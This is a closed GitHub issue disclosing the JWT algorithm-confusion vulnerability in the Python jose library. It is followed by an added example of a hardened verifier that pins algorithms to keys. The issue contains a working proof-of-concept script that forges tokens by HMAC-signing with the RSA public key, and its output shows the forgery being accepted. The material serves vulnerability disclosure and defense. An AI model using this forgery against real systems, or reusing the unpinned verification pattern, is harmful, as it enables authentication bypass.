Closed yuriikonovaliuk closed 8 years ago
There is a critical vulnerability in a bunch of JWT implementations that was recently discovered. See the article here: https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/ The jose library is vulnerable as well. Here is an example implementation of the approach from the article using the jose library:

```python
from Crypto.PublicKey import RSA
from json import loads as json_decode, dumps as json_encode
import jose

private_key = RSA.generate(1024)
public_key = private_key.publickey()


def sign_token(claim, key, alg='RS256'):
    return jose.sign(claim, {'k': key}, alg=alg)


def verify_token(jws, key):
    # No expected algorithm is passed: the token header decides it
    return jose.verify(jws, {'k': key})


if __name__ == '__main__':
    # Token issuer
    claim = {'resource': 'value'}
    jws = sign_token(claim, private_key.exportKey())  # Signed using RSA alg

    # serialization, transfer ....

    # Token forger
    forged_claim = json_decode(jose.b64decode_url(jws.payload))
    forged_claim['resource'] = 'hacked_value'
    # signed using HMAC algorithm with RSA public key
    forged_jws = sign_token(forged_claim, public_key.exportKey(), alg='HS256')

    # Token verification
    print 'verifying valid token:'
    try:
        verify_token(jws, public_key.exportKey())
        print 'success'
    except jose.Error:
        print 'failed'

    print 'verifying forged token:'
    try:
        verify_token(forged_jws, public_key.exportKey())
        print 'success'
    except jose.Error:
        print 'failed'
```
The result of execution is the following:

```
verifying valid token:
success
verifying forged token:
success
```
Which means that anybody with the public key can forge tokens that will pass verification.
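A hardened verifier, added here as an illustration and not part of the issue or of the jose library: the server binds each key to exactly one algorithm and rejects any token whose header `alg` disagrees before doing signature math, so an HS256 token signed with the RSA public key (the forgery above) never reaches the HMAC path. The key ids, key bytes and `KEYS` table are constructed for the example, and only HS256 is implemented.

```python
import base64
import hashlib
import hmac
import json

# Constructed key material (not from the issue). Each key is registered
# together with the single algorithm it may be used with.
HMAC_SECRET = b"constructed-shared-secret"
RSA_PUBLIC_PEM = b"-----BEGIN PUBLIC KEY-----\nconstructed placeholder\n-----END PUBLIC KEY-----\n"
KEYS = {
    "api-hmac": {"key": HMAC_SECRET, "alg": "HS256"},
    "api-rsa": {"key": RSA_PUBLIC_PEM, "alg": "RS256"},
}

def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def hs256_sign(claims, secret):
    # Compact JWS with an HS256 header. Used for the legitimate token and,
    # with the RSA public key as the secret, to mimic the forgery in the issue.
    header = b64url_encode(json.dumps({"alg": "HS256"}).encode())
    payload = b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"

def verify_hs256(signing_input, sig, key):
    expected = hmac.new(key, signing_input, hashlib.sha256).digest()
    return hmac.compare_digest(expected, sig)

# Only HS256 is implemented; an RS256 entry would sit beside it in a real
# deployment (assumption). Any algorithm missing from the table fails closed.
VERIFIERS = {"HS256": verify_hs256}

def verify_pinned(token, key_id):
    """Return the claims if token is valid for key_id, else raise ValueError."""
    entry = KEYS[key_id]
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    # The verifier, not the token header, decides which algorithm is acceptable.
    if header.get("alg") != entry["alg"]:
        raise ValueError(f"alg {header.get('alg')!r} not allowed for key {key_id!r}")
    check = VERIFIERS.get(entry["alg"])
    if check is None:
        raise ValueError(f"no verifier for {entry['alg']!r}")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    if not check(signing_input, b64url_decode(sig_b64), entry["key"]):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(payload_b64))
```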